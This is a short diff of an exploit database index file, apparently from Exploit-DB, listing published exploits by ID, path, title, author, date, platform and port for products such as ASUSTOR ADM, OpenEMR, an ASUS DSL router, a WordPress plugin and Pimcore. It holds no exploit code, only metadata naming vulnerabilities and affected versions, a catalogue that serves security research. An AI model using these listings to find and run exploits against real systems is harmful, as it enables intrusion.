 45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
 45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
 45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
-45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
+45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
+45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443